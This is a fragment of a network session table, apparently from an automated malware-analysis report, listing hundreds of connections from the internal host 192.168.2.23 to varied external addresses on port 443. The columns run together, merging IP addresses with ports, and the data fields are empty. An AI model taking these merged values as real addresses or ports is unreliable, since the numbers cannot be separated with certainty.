                                                23461192.168.2.2355012140.161.220.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23462192.168.2.2348002120.178.61.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23463192.168.2.2349376178.195.89.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23464192.168.2.2348932216.217.221.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23465192.168.2.2352860200.79.81.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23466192.168.2.2351852150.223.201.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23467192.168.2.235733057.75.55.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23468192.168.2.2341214153.101.9.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23469192.168.2.2355576193.8.253.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23470192.168.2.235110637.209.16.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23471192.168.2.2335638118.250.170.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23472192.168.2.2355520121.223.216.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23473192.168.2.2339196111.90.100.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23474192.168.2.233897244.114.207.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23475192.168.2.2358706133.127.48.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23476192.168.2.2349040195.132.122.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23477192.168.2.2339426114.234.35.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23478192.168.2.2343050155.118.161.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23479192.168.2.2359382157.105.235.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23480192.168.2.2347348221.20.125.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23481192.168.2.233634053.227.26.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23482192.168.2.235208436.84.86.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23483192.168.2.233884462.40.18.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23484192.168.2.2345390151.151.219.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23485192.168.2.233616662.149.94.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23486192.168.2.2342540222.170.40.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23487192.168.2.2353986204.30.224.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23488192.168.2.2355872112.129.121.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23489192.168.2.235628878.232.60.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23490192.168.2.2337950144.224.176.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23491192.168.2.2360722143.28.127.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23492192.168.2.2354342123.216.18.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23493192.168.2.2354844137.59.219.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23494192.168.2.2355264170.233.228.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23495192.168.2.2354256116.58.204.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23496192.168.2.236059482.49.123.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23497192.168.2.233945080.15.177.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23498192.168.2.235743427.90.60.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23499192.168.2.2336160156.182.154.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23500192.168.2.235320269.30.3.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23501192.168.2.2348574186.121.11.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23502192.168.2.2356808217.196.44.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23503192.168.2.2348234141.176.38.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23504192.168.2.233728448.96.232.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23505192.168.2.2340362208.78.28.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23506192.168.2.234683452.226.152.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23507192.168.2.2339500102.209.21.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23508192.168.2.2353760102.45.254.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23509192.168.2.2334236198.87.4.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23510192.168.2.233953091.219.85.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23511192.168.2.2352708154.212.152.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23512192.168.2.234702619.239.6.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23513192.168.2.2352428185.29.196.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23514192.168.2.2343382190.98.113.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23515192.168.2.235654094.85.12.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23516192.168.2.2352416154.9.21.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23517192.168.2.2345380187.57.95.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23518192.168.2.2353266212.168.151.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23519192.168.2.2354730125.161.117.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23520192.168.2.2338574104.176.24.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23521192.168.2.233593019.19.157.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23522192.168.2.2334758206.121.228.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23523192.168.2.2353168209.176.58.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23524192.168.2.2333698197.189.129.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23525192.168.2.2349378114.231.254.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23526192.168.2.235008057.1.170.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23527192.168.2.2353206154.212.152.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23528192.168.2.2355902100.47.228.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23529192.168.2.234003491.219.85.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23530192.168.2.2353598152.167.67.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23531192.168.2.2340870110.195.170.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23532192.168.2.2348660196.31.106.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23533192.168.2.2335158199.86.39.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23534192.168.2.2333376107.61.86.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23535192.168.2.2349346103.55.133.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23536192.168.2.2353478156.90.16.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23537192.168.2.233521624.189.73.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23538192.168.2.233608496.53.50.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23539192.168.2.234809859.73.142.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23540192.168.2.233836057.249.241.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23541192.168.2.234550899.71.171.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23542192.168.2.2346076197.254.173.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23543192.168.2.235638866.183.89.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23544192.168.2.2357656165.175.199.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23545192.168.2.235865894.237.177.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23546192.168.2.2348884191.62.233.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23547192.168.2.2342958137.195.210.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23548192.168.2.2345254129.5.155.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23549192.168.2.2338222174.99.10.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23550192.168.2.233980649.56.187.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23551192.168.2.235321271.128.163.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23552192.168.2.234691238.232.59.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23553192.168.2.2360074120.58.22.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23554192.168.2.235208888.182.110.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23555192.168.2.233294658.245.66.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23556192.168.2.2351630115.254.108.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23557192.168.2.2333458173.41.113.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23558192.168.2.234724214.236.20.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23559192.168.2.233944678.55.179.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23560192.168.2.234123463.101.39.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23561192.168.2.235135098.236.114.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23562192.168.2.2358004192.5.238.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23563192.168.2.233861671.179.118.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23564192.168.2.2333154207.16.204.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23565192.168.2.2342450178.8.109.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23566192.168.2.2356560140.50.77.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23567192.168.2.2346160187.130.249.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23568192.168.2.23544328.20.32.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23569192.168.2.2339954163.247.171.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23570192.168.2.234763470.238.181.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23571192.168.2.2347400191.56.251.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23572192.168.2.2349566110.90.129.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23573192.168.2.2349846167.11.26.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23574192.168.2.2355096124.176.124.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23575192.168.2.2350668143.11.154.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23576192.168.2.235996890.151.221.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23577192.168.2.2356984139.76.237.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23578192.168.2.2335682129.70.128.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23579192.168.2.2340660153.174.219.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23580192.168.2.2343388184.172.74.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23581192.168.2.2347634150.251.238.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23582192.168.2.23591548.144.59.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23583192.168.2.2342056200.72.159.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23584192.168.2.2337014197.89.29.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23585192.168.2.2343172170.240.229.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23586192.168.2.235416489.124.165.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23587192.168.2.2345992131.139.162.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23588192.168.2.235936678.45.42.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23589192.168.2.2348662172.224.134.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23590192.168.2.2343194207.195.145.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23591192.168.2.2355798106.93.179.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23592192.168.2.2333654142.68.223.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23593192.168.2.235661075.184.118.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23594192.168.2.234657427.74.15.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23595192.168.2.2337656199.240.92.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23596192.168.2.2358420210.170.99.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23597192.168.2.233540284.68.102.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23598192.168.2.2334872106.107.14.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23599192.168.2.2352200201.6.16.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23600192.168.2.234370245.172.67.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23601192.168.2.2338592146.37.42.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23602192.168.2.2342732106.105.190.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23603192.168.2.2336342199.5.58.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23604192.168.2.233696852.131.166.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23605192.168.2.2341572195.225.117.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23606192.168.2.235668270.148.122.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23607192.168.2.234630217.140.37.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23608192.168.2.233363658.129.45.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23609192.168.2.2334436116.180.40.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23610192.168.2.2345578185.220.124.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23611192.168.2.235392053.36.108.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23612192.168.2.23405625.186.252.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23613192.168.2.2357798176.125.166.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23614192.168.2.2343914154.178.79.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23615192.168.2.2343588212.159.118.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23616192.168.2.2358020104.223.229.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23617192.168.2.23560121.28.122.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23618192.168.2.236020494.15.97.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23619192.168.2.234734085.95.17.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23620192.168.2.2343400213.218.73.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23621192.168.2.2349324151.82.23.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23622192.168.2.2338956116.154.47.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23623192.168.2.2336074163.153.21.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23624192.168.2.2357332129.44.112.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23625192.168.2.2339668220.194.132.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23626192.168.2.234526425.111.140.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23627192.168.2.234880453.95.94.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23628192.168.2.234225895.113.75.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23629192.168.2.2350008153.115.137.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23630192.168.2.236085882.162.108.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23631192.168.2.2345678107.103.67.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23632192.168.2.2344116113.15.87.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23633192.168.2.233846665.193.14.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23634192.168.2.2335860207.151.46.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23635192.168.2.2350804163.62.210.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23636192.168.2.2344380185.113.215.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23637192.168.2.234658017.166.138.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23638192.168.2.2356914159.137.26.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23639192.168.2.2343446217.250.73.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23640192.168.2.2357926154.145.30.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23641192.168.2.2340078198.49.36.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23642192.168.2.2333862216.59.62.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23643192.168.2.235122097.95.160.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23644192.168.2.2346784186.204.100.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23645192.168.2.2339458210.97.14.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23646192.168.2.2343768179.78.237.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23647192.168.2.2359956130.41.166.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23648192.168.2.2336572220.44.19.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23649192.168.2.2346522216.211.92.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23650192.168.2.2351444164.252.49.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23651192.168.2.2340326181.188.135.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23652192.168.2.2352538218.145.188.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23653192.168.2.234490283.174.88.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23654192.168.2.234915874.15.101.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23655192.168.2.234737092.90.74.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23656192.168.2.234186618.181.192.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23657192.168.2.2357562202.242.189.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23658192.168.2.2358052119.125.172.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23659192.168.2.2353032179.120.12.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23660192.168.2.2342300145.201.110.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23661192.168.2.2345470171.76.99.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23662192.168.2.2343716194.8.98.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23663192.168.2.2347196132.208.122.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23664192.168.2.2357032116.58.116.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23665192.168.2.235177888.0.6.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23666192.168.2.233997620.181.255.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23667192.168.2.233451434.163.99.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23668192.168.2.234845069.18.81.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23669192.168.2.2344164191.98.59.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23670192.168.2.23414708.189.3.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23671192.168.2.2341906169.65.161.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23672192.168.2.2341908111.98.169.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23673192.168.2.2351772196.105.240.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23674192.168.2.235582293.180.15.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23675192.168.2.235666246.14.61.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23676192.168.2.2334930164.91.233.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23677192.168.2.2351252125.199.37.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23678192.168.2.234398072.68.244.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23679192.168.2.2359634116.24.90.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23680192.168.2.2333330161.155.132.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23681192.168.2.23345189.113.146.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23682192.168.2.233490837.45.131.54443
                                                TimestampBytes transferredDirectionData


